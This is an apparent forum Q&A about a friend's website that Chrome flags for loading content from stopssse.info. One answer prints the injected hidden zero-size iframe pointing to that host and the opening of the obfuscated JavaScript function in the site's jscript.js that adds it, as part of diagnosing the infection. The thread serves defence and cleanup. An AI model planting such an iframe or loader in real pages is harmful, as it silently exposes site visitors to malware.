How can I test if a website is infected with malware?
Some friends of mine have a website (www.kennelsoffie.dk) and I'm trying to help them when there is any trouble. However this time I, can't figure it out. When I visit the site using Google Chrome, I'm presented with a warning page claiming that the page that I'm trying to visit contains elements from stopssse.info.
I don't know any PHP, so I simply downloaded the complete website including backups of the database (which are .sql files). Then, I searched all the files for stopssse, but I didn't find anything.
I also tested the site with siteadvisor.com it says "We tested this site and didn't find any significant problems".
Can PHP hide a reference to the malware site so I cant find it with a simple search? If so, how can you find it?
Solution 1:
I found this in the generated source
<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">
It was right below the body tag, it's not in the actual page source, it's being added by obfuscated javascript
edit: if you look at the bottom of http://www.kennelsoffie.dk/includes/jscript.js you'll see a really odd looking javascript function. That's the obfuscated javascript function I was telling you about. It starts with
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
Best bet is to find and remove it.
Solution 2:
Your are most probably dealing with XSS attacks.
In that case, two steps :
- Scan the DB, looking for "scripts" tags, and get rid of them.
- Hire a guy who knows PHP to fix the holes in your data input and set some efficient sanitizing policy.
Solution 3:
The malware might not be on the site, but might be coming from material brought in from external sources, such as advertisements.